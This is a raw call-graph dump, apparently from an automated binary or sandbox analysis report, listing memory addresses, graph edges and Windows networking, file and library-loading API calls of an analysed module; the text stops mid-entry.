7ffd92c2d212 100083->100084 100084->100008 100085 7ffd92c2d1d6 100088 7ffd92c27080 53 API calls 100085->100088 100089 7ffd92c2d1cc 100085->100089 100088->100089 100089->100083 100089->100084 100090 7ffd92c2d1fe 100091 7ffd92c2d203 100090->100091 100092 7ffd92c2d21b 100090->100092 100162 7ffd92c26f90 53 API calls 2 library calls 100091->100162 100163 7ffd92c26f90 53 API calls 2 library calls 100092->100163 100094 7ffd92c26eb0 52 API calls 100094->100097 100095 7ffd92c27080 53 API calls 100095->100097 100097->100081 100097->100084 100097->100085 100097->100089 100097->100090 100097->100094 100097->100095 100099 7ffd92c27120 53 API calls 100097->100099 100154 7ffd92c27130 100097->100154 100157 7ffd92c35fa0 QueryPerformanceCounter GetTickCount 100097->100157 100158 7ffd92c33090 60 API calls __create_locale 100097->100158 100159 7ffd92c31f30 53 API calls 100097->100159 100160 7ffd92c59eb0 54 API calls 100097->100160 100161 7ffd92c438a0 53 API calls 100097->100161 100099->100097 100101 7ffd92c2d344 100100->100101 100106 7ffd92c2d361 memcpy_s 100100->100106 100101->100106 100207 7ffd92c35fa0 QueryPerformanceCounter GetTickCount 100101->100207 100103 7ffd92c2d61a 100127 7ffd92c2d540 100103->100127 100203 7ffd92c271b0 100103->100203 100106->100103 100107 7ffd92c2d482 100106->100107 100109 7ffd92c2d438 100106->100109 100106->100127 100177 7ffd92c2b8d0 100107->100177 100108 7ffd92c1d530 2 API calls 100111 7ffd92c2d65e 100108->100111 100112 7ffd92c1d530 2 API calls 100109->100112 100115 7ffd92c2d70c 100111->100115 100116 7ffd92c2d695 WSAIoctl 100111->100116 100113 7ffd92c2d453 100112->100113 100208 7ffd92c175b0 55 API calls 100113->100208 100119 7ffd92c2d74a 100115->100119 100211 7ffd92c26eb0 52 API calls 100115->100211 100116->100115 100118 7ffd92c2d6e8 setsockopt 100116->100118 100117 7ffd92c2d472 100117->100009 100118->100115 100125 7ffd92c2d78e 100119->100125 100212 7ffd92c26eb0 52 API calls 100119->100212 100124 7ffd92c2d553 memcpy_s 100124->100103 100210 7ffd92c44d20 53 API calls memcpy_s 100124->100210 100126 7ffd92c27080 53 API calls 100125->100126 100125->100127 100126->100127 100127->100009 100128 7ffd92c2d531 100209 7ffd92c26f90 53 API calls 2 library calls 100128->100209 100130->100027 100132 7ffd92c1d57d GetTickCount 100131->100132 100133 7ffd92c1d542 QueryPerformanceCounter 100131->100133 100132->100020 100133->100020 100135 7ffd92c2710f 100134->100135 100136 7ffd92c27089 100134->100136 100135->100014 100137 7ffd92c270ff 100136->100137 100230 7ffd92c16100 19 API calls 100136->100230 100139 7ffd92c08950 _except1 8 API calls 100137->100139 100139->100135 100140 7ffd92c270d4 100141 7ffd92c27118 100140->100141 100142 7ffd92c270ea 100140->100142 100232 7ffd92c08a90 8 API calls _Toupper 100141->100232 100231 7ffd92c26eb0 52 API calls 100142->100231 100145 7ffd92c2711d 100146->100017 100147->100019 100148->100032 100149->100027 100150->100027 100151->100027 100152->100027 100153->100027 100164 7ffd92c53660 recv 100154->100164 100157->100097 100158->100097 100159->100097 100160->100097 100161->100097 100162->100084 100163->100084 100165 7ffd92c536e1 WSAGetLastError 100164->100165 100167 7ffd92c5372c 100164->100167 100166 7ffd92c536f9 100165->100166 100173 7ffd92c536f0 100165->100173 100175 7ffd92c11a70 27 API calls strrchr 100166->100175 100170 7ffd92c1d530 2 API calls 100167->100170 100167->100173 100168 7ffd92c08950 _except1 8 API calls 100171 7ffd92c27186 100168->100171 100170->100173 100171->100097 100172 7ffd92c5370b 100176 7ffd92c26f90 53 API calls 2 library calls 100172->100176 100173->100168 100175->100172 100176->100173 100178 7ffd92c2b909 100177->100178 100180 7ffd92c2b99c 100177->100180 100179 7ffd92c27080 53 API calls 100178->100179 100181 7ffd92c2b91d 100179->100181 100182 7ffd92c2ba88 100180->100182 100183 7ffd92c2ba1b 100180->100183 100187 7ffd92c2b96f 100181->100187 100188 7ffd92c2ba37 100181->100188 100184 7ffd92c2bade 100182->100184 100185 7ffd92c2ba91 100182->100185 100214 7ffd92c26f90 53 API calls 2 library calls 100183->100214 100190 7ffd92c2bae3 100184->100190 100197 7ffd92c2baff 100184->100197 100199 7ffd92c2ba2a 100185->100199 100216 7ffd92c26f90 53 API calls 2 library calls 100185->100216 100213 7ffd92c31bc0 53 API calls 2 library calls 100187->100213 100215 7ffd92c26f90 53 API calls 2 library calls 100188->100215 100217 7ffd92c26f90 53 API calls 2 library calls 100190->100217 100192 7ffd92c2b983 100195 7ffd92c27080 53 API calls 100192->100195 100192->100199 100195->100180 100196 7ffd92c08950 _except1 8 API calls 100198 7ffd92c2bc23 100196->100198 100197->100199 100201 7ffd92c2bb7f memcpy_s 100197->100201 100218 7ffd92c15ff0 19 API calls 100197->100218 100198->100124 100198->100127 100198->100128 100199->100196 100201->100199 100202 7ffd92c27080 53 API calls 100201->100202 100202->100199 100204 7ffd92c271c6 100203->100204 100219 7ffd92c53560 send 100204->100219 100207->100106 100208->100117 100209->100127 100210->100103 100211->100119 100212->100125 100213->100192 100214->100199 100215->100199 100216->100199 100217->100199 100218->100201 100220 7ffd92c535e0 WSAGetLastError 100219->100220 100227 7ffd92c535ef 100219->100227 100221 7ffd92c535f7 100220->100221 100220->100227 100228 7ffd92c11a70 27 API calls strrchr 100221->100228 100222 7ffd92c08950 _except1 8 API calls 100224 7ffd92c271ec 100222->100224 100224->100108 100224->100127 100225 7ffd92c53609 100229 7ffd92c26f90 53 API calls 2 library calls 100225->100229 100227->100222 100228->100225 100229->100227 100230->100140 100231->100137 100232->100145 100234 7ffd92c1d9e0 100233->100234 100235 7ffd92c1d9c5 100233->100235 100237 7ffd92c187d1 100234->100237 100238 7ffd92c1dad8 EnterCriticalSection LeaveCriticalSection 100234->100238 100235->100234 100236 7ffd92c1d9d4 100235->100236 100262 7ffd92c388e0 WaitForSingleObjectEx CloseHandle 100236->100262 100237->100045 100259 7ffd92c35be0 57 API calls 100237->100259 100239 7ffd92c1db11 CloseHandle 100238->100239 100240 7ffd92c1db1b 100238->100240 100242 7ffd92c1db32 100239->100242 100243 7ffd92c1db21 100240->100243 100244 7ffd92c1db29 100240->100244 100248 7ffd92c1db47 closesocket 100242->100248 100263 7ffd92c388e0 WaitForSingleObjectEx CloseHandle 100243->100263 100264 7ffd92c1db80 DeleteCriticalSection closesocket 100244->100264 100245 7ffd92c1d9d9 100245->100234 100248->100237 100250 7ffd92c1a917 100249->100250 100252 7ffd92c1a950 100249->100252 100265 7ffd92c175b0 55 API calls 100250->100265 100252->100049 100254 7ffd92c2e501 100253->100254 100258 7ffd92c2e52d 100253->100258 100254->100258 100266 7ffd92c9af90 9 API calls 100254->100266 100255 7ffd92c08950 _except1 8 API calls 100256 7ffd92c2e57d 100255->100256 100256->100051 100258->100255 100259->100045 100260->100054 100261->100059 100262->100245 100263->100244 100264->100242 100265->100252 100266->100258 100268 7ffd92c1dac0 100267->100268 100269 7ffd92c1dad8 EnterCriticalSection LeaveCriticalSection 100268->100269 100274 7ffd92c1db5f 100268->100274 100270 7ffd92c1db11 CloseHandle 100269->100270 100271 7ffd92c1db1b 100269->100271 100277 7ffd92c1db32 100270->100277 100272 7ffd92c1db21 100271->100272 100273 7ffd92c1db29 100271->100273 100279 7ffd92c388e0 WaitForSingleObjectEx CloseHandle 100272->100279 100280 7ffd92c1db80 DeleteCriticalSection closesocket 100273->100280 100274->100075 100278 7ffd92c1db47 closesocket 100277->100278 100278->100274 100279->100273 100280->100277 100281 7ffd92c532b0 100282 7ffd92c532ec 100281->100282 100297 7ffd92c532f1 100281->100297 100283 7ffd92c533f8 100282->100283 100282->100297 100310 7ffd92c549e0 100282->100310 100286 7ffd92c370d0 19 API calls 100283->100286 100284 7ffd92c08950 _except1 8 API calls 100287 7ffd92c534ad 100284->100287 100289 7ffd92c53411 100286->100289 100291 7ffd92c53453 100289->100291 100294 7ffd92c5342d 100289->100294 100289->100297 100290 7ffd92c53365 100292 7ffd92c533c3 100290->100292 100293 7ffd92c53379 WSASetLastError 100290->100293 100290->100297 100359 7ffd92c550d0 SleepEx getsockopt 100291->100359 100292->100297 100302 7ffd92c54fa0 closesocket 100292->100302 100377 7ffd92c11a70 27 API calls strrchr 100293->100377 100294->100290 100304 7ffd92c550d0 3 API calls 100294->100304 100297->100284 100298 7ffd92c5334d WSAGetLastError 100376 7ffd92c54290 58 API calls _except1 100298->100376 100299 7ffd92c5332f connect 100299->100283 100299->100298 100300 7ffd92c533a1 100305 7ffd92c27080 53 API calls 100300->100305 100302->100297 100304->100290 100305->100292 100306 7ffd92c5346e 100307 7ffd92c1d530 2 API calls 100306->100307 100308 7ffd92c53478 100307->100308 100362 7ffd92c54e50 getsockname 100308->100362 100311 7ffd92c1d530 2 API calls 100310->100311 100312 7ffd92c54a18 100311->100312 100378 7ffd92c55030 100312->100378 100314 7ffd92c54a38 100319 7ffd92c54aa7 100314->100319 100381 7ffd92c27d50 100314->100381 100316 7ffd92c54e1b closesocket 100324 7ffd92c54ad7 100316->100324 100317 7ffd92c08950 _except1 8 API calls 100320 7ffd92c53310 100317->100320 100318 7ffd92c54a5c 100321 7ffd92c54aff 100318->100321 100328 7ffd92c54a64 100318->100328 100319->100316 100319->100324 100320->100290 100320->100297 100320->100298 100320->100299 100322 7ffd92c27080 53 API calls 100321->100322 100323 7ffd92c54b35 100322->100323 100325 7ffd92c54ba8 100323->100325 100326 7ffd92c54b53 setsockopt 100323->100326 100324->100317 100336 7ffd92c54be7 100325->100336 100394 7ffd92c59940 100325->100394 100326->100325 100327 7ffd92c54b7e WSAGetLastError 100326->100327 100393 7ffd92c11a70 27 API calls strrchr 100327->100393 100391 7ffd92c11a70 27 API calls strrchr 100328->100391 100332 7ffd92c54beb 100339 7ffd92c54c77 setsockopt 100332->100339 100343 7ffd92c54cb9 100332->100343 100333 7ffd92c54c08 getsockopt 100337 7ffd92c54c2f 100333->100337 100338 7ffd92c54c39 setsockopt 100333->100338 100334 7ffd92c54b96 100340 7ffd92c27080 53 API calls 100334->100340 100335 7ffd92c54a92 100392 7ffd92c26f90 53 API calls 2 library calls 100335->100392 100336->100332 100336->100333 100337->100332 100337->100338 100338->100332 100342 7ffd92c54ca7 100339->100342 100348 7ffd92c54cbe 100339->100348 100340->100325 100344 7ffd92c27080 53 API calls 100342->100344 100343->100319 100345 7ffd92c54da7 100343->100345 100346 7ffd92c54dde 100343->100346 100344->100343 100411 7ffd92c543e0 120 API calls 5 library calls 100345->100411 100390 7ffd92c5e080 ioctlsocket 100346->100390 100350 7ffd92c54cea WSAIoctl 100348->100350 100349 7ffd92c54deb 100349->100324 100355 7ffd92c54e50 61 API calls 100349->100355 100350->100343 100353 7ffd92c54d32 WSAGetLastError 100350->100353 100352 7ffd92c54dc7 100352->100346 100354 7ffd92c54dcd 100352->100354 100356 7ffd92c27080 53 API calls 100353->100356 100354->100319 100357 7ffd92c54dfb 100355->100357 100356->100343 100358 7ffd92c1d530 2 API calls 100357->100358 100358->100324 100360 7ffd92c55121 WSAGetLastError 100359->100360 100361 7ffd92c53466 100359->100361 100360->100361 100361->100290 100361->100306 100363 7ffd92c54ecd WSAGetLastError 100362->100363 100364 7ffd92c54f06 100362->100364 100414 7ffd92c11a70 27 API calls strrchr 100363->100414 100366 7ffd92c27d50 20 API calls 100364->100366 100372 7ffd92c54f22 100366->100372 100367 7ffd92c54eea 100415 7ffd92c26f90 53 API calls 2 library calls 100367->100415 100369 7ffd92c54eff 100370 7ffd92c08950 _except1 8 API calls 100369->100370 100371 7ffd92c54f88 100370->100371 100371->100297 100372->100369 100416 7ffd92c11a70 27 API calls strrchr 100372->100416 100374 7ffd92c54f52 100417 7ffd92c26f90 53 API calls 2 library calls 100374->100417 100376->100290 100377->100300 100379 7ffd92c5507a socket 100378->100379 100380 7ffd92c55052 100378->100380 100379->100380 100380->100314 100382 7ffd92c27de8 100381->100382 100385 7ffd92c27d72 100381->100385 100384 7ffd92c27e05 100382->100384 100413 7ffd92c15ff0 19 API calls 100382->100413 100384->100318 100386 7ffd92c27dc2 100385->100386 100412 7ffd92c55c40 19 API calls _except1 100385->100412 100386->100318 100388 7ffd92c27d91 100388->100386 100389 7ffd92c27d96 htons 100388->100389 100389->100318 100390->100349 100391->100335 100392->100319 100393->100334 100395 7ffd92c5997f GetModuleHandleA GetProcAddress 100394->100395 100396 7ffd92c599aa memcpy_s 100394->100396 100395->100396 100397 7ffd92c599db 100396->100397 100398 7ffd92c59a49 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 100396->100398 100401 7ffd92c08950 _except1 8 API calls 100397->100401 100399 7ffd92c59a91 VerSetConditionMask 100398->100399 100400 7ffd92c59aa8 100398->100400 100399->100400 100403 7ffd92c59abf RtlVerifyVersionInfo 100400->100403 100404 7ffd92c59aca VerifyVersionInfoW 100400->100404 100402 7ffd92c59b71 100401->100402 100402->100336 100408 7ffd92c59ad6 100403->100408 100404->100408 100405 7ffd92c59b0c VerSetConditionMask 100406 7ffd92c59b41 VerifyVersionInfoW 100405->100406 100407 7ffd92c59b36 RtlVerifyVersionInfo 100405->100407 100406->100397 100407->100397 100408->100397 100408->100405 100409 7ffd92c59940 8 API calls 100408->100409 100410 7ffd92c59b08 100409->100410 100410->100397 100410->100405 100411->100352 100412->100388 100413->100384 100414->100367 100415->100369 100416->100374 100417->100369 100418 7ffd92cadff0 CreateFileW 100419 7ffd92c959b0 100420 7ffd92c959bc 100419->100420 100422 7ffd92c959ea 100420->100422 100423 7ffd92c9d7f0 EnterCriticalSection LeaveCriticalSection new 100420->100423 100423->100420 100424 7ffd92bf6120 100459 7ffd92bf3550 100424->100459 100427 7ffd92bf3550 174 API calls 100428 7ffd92bf6179 100427->100428 100521 7ffd92bf5730 100428->100521 100431 7ffd92bf3550 174 API calls 100455 7ffd92bf6192 100431->100455 100432 7ffd92bf6412 100604 7ffd92bf3d00 100432->100604 100441 7ffd92c0a500 7 API calls std::_Lockit::_Lockit 100441->100455 100454 7ffd92c0a5e0 LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 100454->100455 100455->100432 100455->100441 100455->100454 100701 7ffd92c03b90 19 API calls Concurrency::cancel_current_task 100455->100701 100702 7ffd92be9df0 100455->100702 100709 7ffd92c03300 19 API calls 3 library calls 100455->100709 100723 7ffd92c08cf0 100459->100723 100465 7ffd92bf3606 100761 7ffd92bfc9f0 100465->100761 100468 7ffd92be96b0 17 API calls 100469 7ffd92bf3623 100468->100469 100470 7ffd92bf363d delete 100469->100470 100471 7ffd92be99c0 _Receive_impl 8 API calls 100469->100471 100769 7ffd92beeaa0 100470->100769 100471->100470 100473 7ffd92bf366a 100510 7ffd92bf3a8c delete 100473->100510 100843 7ffd92bf09b0 100473->100843 100474 7ffd92be96b0 17 API calls 100476 7ffd92bf3ab9 100474->100476 100478 7ffd92bf3ad3 delete 100476->100478 100480 7ffd92be99c0 _Receive_impl 8 API calls 100476->100480 100483 7ffd92c08950 _except1 8 API calls 100478->100483 100480->100478 100485 7ffd92bf3b09 100483->100485 100485->100427 100510->100474 100522 7ffd92c08cf0 new 4 API calls 100521->100522 100523 7ffd92bf579a 100522->100523 100524 7ffd92beeaa0 80 API calls 100523->100524 100525 7ffd92bf57bf 100524->100525 100526 7ffd92bf5efe 100525->100526 100527 7ffd92bf5f7c 100525->100527 100530 7ffd92c08cf0 new 4 API calls 100525->100530 100528 7ffd92be96b0 17 API calls 100526->100528 101706 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 100527->101706 100531 7ffd92bf5f07 100528->100531 100539 7ffd92bf5827 100530->100539 100533 7ffd92bf5f21 delete 100531->100533 100535 7ffd92be99c0 _Receive_impl 8 API calls 100531->100535 100537 7ffd92c08950 _except1 8 API calls 100533->100537 100534 7ffd92bf5872 memcpy_s 101699 7ffd92bf5160 85 API calls 5 library calls 100534->101699 100535->100533 100540 7ffd92bf5f55 100537->100540 100539->100534 100542 7ffd92c07e50 4 API calls 100539->100542 100540->100431 100542->100534 100543 7ffd92bf58c4 100544 7ffd92be96b0 17 API calls 100543->100544 100545 7ffd92bf58cf 100544->100545 100546 7ffd92bf58ec delete 100545->100546 100547 7ffd92be99c0 _Receive_impl 8 API calls 100545->100547 100548 7ffd92bf09b0 103 API calls 100546->100548 100547->100546 100549 7ffd92bf5920 100548->100549 101700 7ffd92bf4bc0 146 API calls 6 library calls 100549->101700 100551 7ffd92bf5939 101701 7ffd92bf3b30 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection new 100551->101701 100605 7ffd92c08cf0 new 4 API calls 100604->100605 100606 7ffd92bf3d6d 100605->100606 100607 7ffd92bee810 20 API calls 100606->100607 100701->100455 100703 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 100702->100703 100706 7ffd92be9e25 100703->100706 100704 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 100705 7ffd92be9e75 100704->100705 100707 7ffd92c08950 _except1 8 API calls 100705->100707 100706->100704 100709->100455 100724 7ffd92c08cf9 _heap_alloc 100723->100724 100725 7ffd92bf35bf 100724->100725 101060 7ffd92c9d7f0 EnterCriticalSection LeaveCriticalSection new 100724->101060 101061 7ffd92c098a0 RtlPcToFileHeader RaiseException std::_Xinvalid_argument Concurrency::cancel_current_task 100724->101061 101062 7ffd92c09870 RtlPcToFileHeader RaiseException std::_Xinvalid_argument std::bad_alloc::bad_alloc 100724->101062 100729 7ffd92bee810 SHGetFolderPathA 100725->100729 100730 7ffd92bee955 100729->100730 100731 7ffd92bee85f 100729->100731 100732 7ffd92c04450 12 API calls 100730->100732 100735 7ffd92c04450 12 API calls 100731->100735 100733 7ffd92bee92c delete 100732->100733 100734 7ffd92c08950 _except1 8 API calls 100733->100734 100737 7ffd92bee989 100734->100737 100736 7ffd92bee898 100735->100736 100738 7ffd92c08cf0 new 4 API calls 100736->100738 100748 7ffd92bffc80 100737->100748 100739 7ffd92bee8b5 100738->100739 100740 7ffd92bee8c7 100739->100740 100741 7ffd92bee8d6 100739->100741 101063 7ffd92be9f60 17 API calls 3 library calls 100740->101063 100743 7ffd92be96b0 17 API calls 100741->100743 100744 7ffd92bee8d4 100743->100744 100745 7ffd92be96b0 17 API calls 100744->100745 100746 7ffd92bee90f 100745->100746 100746->100733 100747 7ffd92be99c0 _Receive_impl 8 API calls 100746->100747 100747->100733 100749 7ffd92bffcde 100748->100749 100754 7ffd92bffca9 memcpy_s 100748->100754 100750 7ffd92bffdd8 100749->100750 100751 7ffd92bffcf7 100749->100751 101073 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 100750->101073 101064 7ffd92c07e50 100751->101064 100754->100465 100756 7ffd92bffd41 100757 7ffd92be96b0 17 API calls 100756->100757 100758 7ffd92bffd4c memcpy_s 100757->100758 100759 7ffd92be99c0 _Receive_impl 8 API calls 100758->100759 100760 7ffd92bffd94 memcpy_s 100758->100760 100759->100760 100760->100465 100762 7ffd92c08cf0 new 4 API calls 100761->100762 100763 7ffd92bfca21 100762->100763 100764 7ffd92bfca32 100763->100764 100765 7ffd92bfca3f 100763->100765 101078 7ffd92be9f60 17 API calls 3 library calls 100764->101078 100767 7ffd92be96b0 17 API calls 100765->100767 100768 7ffd92bf3612 100767->100768 100768->100468 100770 7ffd92beead3 100769->100770 101079 7ffd92c0ae10 100770->101079 100777 7ffd92beebaa 100779 7ffd92be96b0 17 API calls 100777->100779 100778 7ffd92beec1f 101106 7ffd92bed680 100778->101106 100781 7ffd92beebb4 100779->100781 100783 7ffd92beebce delete 100781->100783 101113 7ffd92c01430 8 API calls 3 library calls 100781->101113 100786 7ffd92c08950 _except1 8 API calls 100783->100786 100788 7ffd92beec08 100786->100788 100788->100473 100848 7ffd92bf0a00 100843->100848 100844 7ffd92bf0a96 101221 7ffd92bfcbd0 100844->101221 100846 7ffd92bf0a45 100849 7ffd92bf0a6b 100846->100849 100850 7ffd92bf0cf1 100846->100850 100847 7ffd92bf0a8f 101170 7ffd92c06010 100847->101170 100848->100844 100848->100846 100854 7ffd92c04450 12 API calls 100849->100854 101233 7ffd92c01510 10 API calls 3 library calls 100850->101233 100853 7ffd92bf0cf6 100854->100847 100855 7ffd92bf0abc 100856 7ffd92bfc9f0 19 API calls 100855->100856 100857 7ffd92bf0ac7 100856->100857 100858 7ffd92be96b0 17 API calls 100857->100858 100859 7ffd92bf0adb 100858->100859 100860 7ffd92be99c0 _Receive_impl 8 API calls 100859->100860 100861 7ffd92bf0af8 delete memcpy_s 100859->100861 100860->100861 101182 7ffd92bf9e60 100861->101182 101060->100724 101061->100724 101062->100724 101063->100744 101065 7ffd92c07f06 101064->101065 101066 7ffd92c07e61 101064->101066 101065->100756 101067 7ffd92c07f1b 101066->101067 101068 7ffd92c07e6e 101066->101068 101074 7ffd92be9d50 101067->101074 101070 7ffd92c08cf0 new 4 API calls 101068->101070 101072 7ffd92c07e7b 101070->101072 101071 7ffd92c07f20 overwrite_buffer 101071->100756 101072->100756 101075 7ffd92be9d5e Concurrency::cancel_current_task 101074->101075 101076 7ffd92c69dd0 std::_Xinvalid_argument 2 API calls 101075->101076 101077 7ffd92be9d6f Concurrency::cancel_current_task 101076->101077 101077->101071 101078->100768 101114 7ffd92ca49a0 101079->101114 101082 7ffd92c0ae27 AreFileApisANSI 101083 7ffd92beeb48 101082->101083 101084 7ffd92bec1f0 101083->101084 101085 7ffd92c08cf0 new 4 API calls 101084->101085 101086 7ffd92bec240 101085->101086 101087 7ffd92bec345 101086->101087 101099 7ffd92bec36f 101086->101099 101123 7ffd92c0ae40 MultiByteToWideChar GetLastError 101086->101123 101100 7ffd92bee060 101087->101100 101090 7ffd92bec375 101128 7ffd92bea840 19 API calls std::_Xinvalid_argument 101090->101128 101092 7ffd92bec2b0 101125 7ffd92c0ae40 MultiByteToWideChar GetLastError 101092->101125 101093 7ffd92bec295 101093->101090 101093->101092 101124 7ffd92c04fc0 19 API calls 2 library calls 101093->101124 101097 7ffd92bec33a 101097->101087 101126 7ffd92bea840 19 API calls std::_Xinvalid_argument 101097->101126 101127 7ffd92bea4c0 19 API calls 2 library calls 101099->101127 101101 7ffd92bee092 101100->101101 101129 7ffd92c0b230 101101->101129 101104 7ffd92c08950 _except1 8 API calls 101105 7ffd92bee130 101104->101105 101105->100777 101105->100778 101168 7ffd92bfcb90 12 API calls 101106->101168 101108 7ffd92bed6a5 101169 7ffd92bece30 24 API calls 2 library calls 101108->101169 101110 7ffd92bed6c7 101111 7ffd92c69dd0 std::_Xinvalid_argument 2 API calls 101110->101111 101112 7ffd92bed6d8 101111->101112 101113->100783 101115 7ffd92ca49a9 __vcrt_getptd 101114->101115 101118 7ffd92cb7870 101115->101118 101119 7ffd92cb788a _Toupper _except1 101118->101119 101121 7ffd92c0ae19 101119->101121 101122 7ffd92cd5720 2 API calls 4 library calls 101119->101122 101121->101082 101121->101083 101122->101121 101123->101093 101124->101092 101125->101097 101127->101090 101137 7ffd92c0b26e operator&= _Bitmask_includes 101129->101137 101130 7ffd92c0b2ac 101131 7ffd92c08950 _except1 8 API calls 101130->101131 101132 7ffd92bee0ab 101131->101132 101132->101104 101133 7ffd92c0b38b GetFileAttributesExW 101134 7ffd92c0b3ab GetLastError 101133->101134 101142 7ffd92c0b438 operator&= fegetenv 101133->101142 101134->101130 101135 7ffd92c0b3c5 FindFirstFileW 101134->101135 101138 7ffd92c0b3f3 FindClose 101135->101138 101139 7ffd92c0b3e8 GetLastError 101135->101139 101137->101130 101137->101133 101137->101142 101138->101142 101139->101130 101140 7ffd92c0b52c 101141 7ffd92c0b533 101140->101141 101144 7ffd92c0b54e Concurrency::details::ContextBase::GetWorkQueueIdentity _Bitmask_includes 101140->101144 101162 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101141->101162 101142->101130 101161 7ffd92c0ac00 GetLastError CreateFileW std::_Fs_file::_Fs_file 101142->101161 101145 7ffd92c0b5a4 GetFileInformationByHandleEx 101144->101145 101156 7ffd92c0b68f operator&= Concurrency::details::ContextBase::GetWorkQueueIdentity _Bitmask_includes 101144->101156 101146 7ffd92c0b5c1 GetLastError 101145->101146 101157 7ffd92c0b5de operator&= Concurrency::details::ContextBase::GetWorkQueueIdentity _Bitmask_includes 101145->101157 101163 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101146->101163 101148 7ffd92c0b774 101166 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101148->101166 101149 7ffd92c0b78c 101167 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101149->101167 101152 7ffd92c0b6f1 GetFileInformationByHandleEx 101153 7ffd92c0b711 GetLastError 101152->101153 101154 7ffd92c0b72b operator&= 101152->101154 101165 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101153->101165 101154->101148 101154->101149 101156->101152 101156->101154 101157->101156 101158 7ffd92c0b652 GetFileInformationByHandleEx 101157->101158 101158->101156 101159 7ffd92c0b672 GetLastError 101158->101159 101164 7ffd92c0ac70 CloseHandle __std_fs_close_handle 101159->101164 101161->101140 101162->101130 101163->101130 101164->101130 101165->101130 101166->101130 101167->101130 101168->101108 101169->101110 101171 7ffd92c060b0 101170->101171 101175 7ffd92c06038 memcpy_s 101170->101175 101172 7ffd92c0618a 101171->101172 101173 7ffd92c060c9 101171->101173 101234 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 101172->101234 101176 7ffd92c07e50 4 API calls 101173->101176 101175->100855 101177 7ffd92c06106 101176->101177 101178 7ffd92be96b0 17 API calls 101177->101178 101179 7ffd92c06111 memcpy_s 101178->101179 101179->101175 101181 7ffd92be99c0 _Receive_impl 8 API calls 101179->101181 101181->101175 101235 7ffd92bec010 101182->101235 101184 7ffd92bf9f27 101243 7ffd92c017c0 101184->101243 101222 7ffd92bfcc17 101221->101222 101223 7ffd92bfcccf 101222->101223 101224 7ffd92bfcc2d 101222->101224 101606 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 101223->101606 101226 7ffd92c08cf0 new 4 API calls 101224->101226 101228 7ffd92bfcc41 101226->101228 101229 7ffd92c07e50 4 API calls 101228->101229 101231 7ffd92bfcc56 memcpy_s 101228->101231 101229->101231 101230 7ffd92c08950 _except1 8 API calls 101232 7ffd92bfccbc 101230->101232 101231->101230 101232->100847 101233->100853 101236 7ffd92bec05e new[] 101235->101236 101237 7ffd92bec086 101236->101237 101238 7ffd92bec066 101236->101238 101282 7ffd92c09870 RtlPcToFileHeader RaiseException std::_Xinvalid_argument std::bad_alloc::bad_alloc 101237->101282 101273 7ffd92c0c2e0 101238->101273 101242 7ffd92bec08b Concurrency::cancel_current_task 101242->101184 101244 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 101243->101244 101245 7ffd92c017f0 101244->101245 101246 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 101245->101246 101248 7ffd92c0183f 101245->101248 101247 7ffd92c01815 101246->101247 101261 7ffd92c0188c 101248->101261 101301 7ffd92beb1d0 62 API calls 8 library calls 101248->101301 101283 7ffd92c0a500 101273->101283 101275 7ffd92c0c2fd 101281 7ffd92c0c32a Concurrency::details::EventWaitNode::EventWaitNode _Yarn 101275->101281 101295 7ffd92c0c600 RtlPcToFileHeader RaiseException 101275->101295 101278 7ffd92c0c31b 101296 7ffd92c0c660 EncodePointer std::locale::_Setgloballocale 101278->101296 101289 7ffd92c0a5e0 101281->101289 101282->101242 101284 7ffd92c0a522 101283->101284 101285 7ffd92c0a529 101283->101285 101297 7ffd92ca47d0 6 API calls 2 library calls 101284->101297 101287 7ffd92c0a527 101285->101287 101298 7ffd92c0dbb0 EnterCriticalSection 101285->101298 101287->101275 101290 7ffd92c0a5f3 101289->101290 101291 7ffd92c0a5fa 101289->101291 101295->101278 101296->101281 101297->101287 101298->101287 101699->100543 101700->100551 101725 7ffd92c394a0 101728 7ffd92c59d90 101725->101728 101729 7ffd92c59d9e 101728->101729 101735 7ffd92c394a9 101728->101735 101730 7ffd92c59940 20 API calls 101729->101730 101731 7ffd92c59db9 101730->101731 101736 7ffd92c28fc0 GetModuleHandleA 101731->101736 101733 7ffd92c59dd2 101734 7ffd92c59dde GetProcAddressForCaller 101733->101734 101733->101735 101734->101735 101737 7ffd92c28fe2 101736->101737 101738 7ffd92c28fea GetProcAddress 101736->101738 101737->101733 101753 7ffd92cb3b40 101738->101753 101741 7ffd92c2904d 101745 7ffd92c29052 GetProcAddress 101741->101745 101746 7ffd92c29085 GetSystemDirectoryA 101741->101746 101742 7ffd92c29016 101743 7ffd92c2901e 101742->101743 101744 7ffd92c29037 LoadLibraryA 101742->101744 101743->101733 101744->101733 101745->101746 101747 7ffd92c29067 LoadLibraryExA 101745->101747 101748 7ffd92c2909f 101746->101748 101752 7ffd92c29126 101746->101752 101747->101733 101749 7ffd92c290cd GetSystemDirectoryA 101748->101749 101748->101752 101750 7ffd92c290dd 101749->101750 101749->101752 101751 7ffd92c29131 LoadLibraryA 101750->101751 101750->101752 101751->101752 101752->101733 101754 7ffd92cb3bcf 101753->101754 101755 7ffd92cb4040 101754->101755 101756 7ffd92cb3d48 101754->101756 101763 7ffd92cb3a10 12 API calls 2 library calls 101755->101763 101758 7ffd92cb40cc 101756->101758 101759 7ffd92cb40b2 101756->101759 101760 7ffd92c29011 101756->101760 101758->101760 101765 7ffd92cb3a10 12 API calls 2 library calls 101758->101765 101764 7ffd92cb3a10 12 API calls 2 library calls 101759->101764 101760->101741 101760->101742 101763->101760 101764->101760 101765->101760 101766 7ffd92c190a0 101793 7ffd92c26460 101766->101793 101769 7ffd92c190c0 101770 7ffd92c18790 70 API calls 101769->101770 101771 7ffd92c18dfc 101769->101771 101770->101771 101791 7ffd92c18c30 101771->101791 101807 7ffd92c281f0 10 API calls _except1 101771->101807 101772 7ffd92c1a900 55 API 